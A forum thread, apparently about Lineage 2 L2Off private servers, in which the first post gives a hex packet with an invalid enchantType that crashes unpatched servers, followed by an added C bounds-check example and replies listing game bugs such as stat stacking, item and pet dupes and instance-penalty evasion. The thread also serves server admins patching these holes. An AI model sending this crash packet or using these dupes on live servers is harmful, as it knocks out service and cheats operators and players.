Crashing L2Off Server With RequestExEnchantSkillInfo Packet


Hi,

 

not tested on AdvExt64/Vanganth but crashes unpatched l2off revision 83 (doesn't work with protocol version 148 or higher). It's very simple, you go to NPC where you enchant skills, open skill enchanting and then just send RequestExEnchantSkillInfo packet with invalid enchantType (valid values are 0-3):

 

D0 0E 00 04 00 00 00 01 00 00 00 65 00 00 00

 

D0 : (uint8) ex packet

0E 00 : (uint16) RequestExEnchantSkillInfo

04 00 00 00 : (uint32) enchantType (4)

01 00 00 00 : (uint32) skillId (1)

65 00 00 00 : (uint32) skillLevel (101)

 

If the server is vulnerable, it will crash immediately.

 

Fix here: http://www.maxcheaters.com/topic/203385-fix-for-gf83-crash-with-requestexenchantskillinfo/ so be quick :)

Edited by eressea
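
A server-side bounds check for the packet described in the first post, as an added example that is not part of the original post and is not the fix linked there. The field layout and the valid range 0-3 come from the post; the function, struct and result names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Layout and valid range (0-3) are from the post; all names here are hypothetical. */
#define OP_EX                     0xD0
#define EX_REQ_ENCHANT_SKILL_INFO 0x000E
#define ENCHANT_TYPE_MAX          3u

enum parse_result { PKT_OK = 0, PKT_SHORT, PKT_NOT_OURS, PKT_BAD_ENCHANT_TYPE };

struct enchant_skill_info_req {
    uint32_t enchant_type, skill_id, skill_level;
};

/* Little-endian reads, byte by byte: no alignment or host-endianness assumptions. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Validate before any handler sees the values; the caller drops the packet on non-OK. */
enum parse_result parse_enchant_skill_info(const uint8_t *buf, size_t len,
                                           struct enchant_skill_info_req *out)
{
    if (len < 3) return PKT_SHORT;
    if (buf[0] != OP_EX || rd16(buf + 1) != EX_REQ_ENCHANT_SKILL_INFO)
        return PKT_NOT_OURS;
    if (len < 15) return PKT_SHORT;          /* 1 + 2 + 3 * 4 bytes */

    uint32_t type = rd32(buf + 3);
    if (type > ENCHANT_TYPE_MAX)             /* unsigned compare also rejects 0xFFFFFFFF */
        return PKT_BAD_ENCHANT_TYPE;

    out->enchant_type = type;
    out->skill_id     = rd32(buf + 7);
    out->skill_level  = rd32(buf + 11);
    return PKT_OK;
}

int main(void)
{
    /* The packet quoted in the post: enchantType = 4. */
    const uint8_t bad[] = {0xD0,0x0E,0x00, 0x04,0,0,0, 0x01,0,0,0, 0x65,0,0,0};
    struct enchant_skill_info_req r;
    printf("result=%d\n", parse_enchant_skill_info(bad, sizeof bad, &r));
    return 0;
}
```
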

need to test on vang and advext64 :P

 

Edited by Rollo

Nah it won't work on either, was on a list of bugs they had fixed back even before the gf server leaked public

 

Does anyone have such list? I desperately need it :))


Couldn't find the little private list, was on one of my svn's which is loooooong since deactivated, but I did find a bug report doc from my original GF work so maybe you'll find that useful.

Gracia Final Bugs:
 
 
The Instance Bug:
 
This bug is fairly simple.
Several parties may enter an instance and fight to the end, to reach the boss.
The problem is that if a party logs out, and the rest finish the boss.
The instance penalty is NOT applied to the party who left/logged out.
 
Solution:
When entering instance, create vector with user DB IDs of all members, if instance is successful apply penalty to all users.
Maybe after the original function that applies penalty has run its course.
Instance penalties are character based - see user_inzone for data.
 
 
 
Olympiad Bug:
 
Either 
 
A: Single 1v1 matches (class and classless) are treated as 3v3 matches and points are calced this way.
or
B: Single 1v1 matches (class and classless) are calculated the following way: 1/5 or 1/3 of points trade hands when a loser/winner is found.
 
 
 
 
Augmentation Bug:
 
Any Stat (str/int/men/con/dex/wit) - can be stacked constantly by equip/reequip and then logging out.
Process can be repeated for unlimited up to 99 in stat points.
 
Seems to work only with 1 stat point, if augment item has 2 stat incrementers, latter is chosen to stack.
If item is moved by database or server restarted - the stat stacking goes away.
Must be a bad map/vector stacking on somewhere.
 
 
 
Hide Bug:
 
Supposedly some bug wherein if you in prematch time @ olympiad use the skill "hide".
You're still attackable (maybe with /attackforce) - gonna be a shitter to test.
But yea.

Hide bug is a bit more broad than described though, pets can also continue auto attacking after hide skills are used and a few other things like that.

Another bug I remember off the top of my head also is the last second of cooldown on skills is ignored by the server.

 

have fun :p

Edited by Anarchy

few I remember from playing - 1hp bug after rez, safe skill enchant with dropping book on the ground, pet inventory dupe, forever open SOD, there was also some shit item dupe with fishing but don't remember exactly, 3vs3 oly points calculation was bugged, opening any multisell from any npc.


Thanks a lot!

 

1hp bug - is it this one http://boards.lineage2.com/archive/index.php/t-201517.html ?

forever open SOD - can you please remember more details?


1hp - yes exactly,

it was not closing itself after X time, so ppl were farming ECS's for days (sometimes weeks) until GM made restart (don't remember if he was able to close it while running),

problem was blocking Tiat instance.

 

Also funny one - pets were following owner on hide :D


a few years ago, but now, this packet does not work, I remember do with "INVISIBLE" server crashes all of time. ;p

 

Fortunately these crashes are not invisible, they're clearly visible in LinError.txt

It would be worse if you manage to somehow corrupt stack or heap or something...
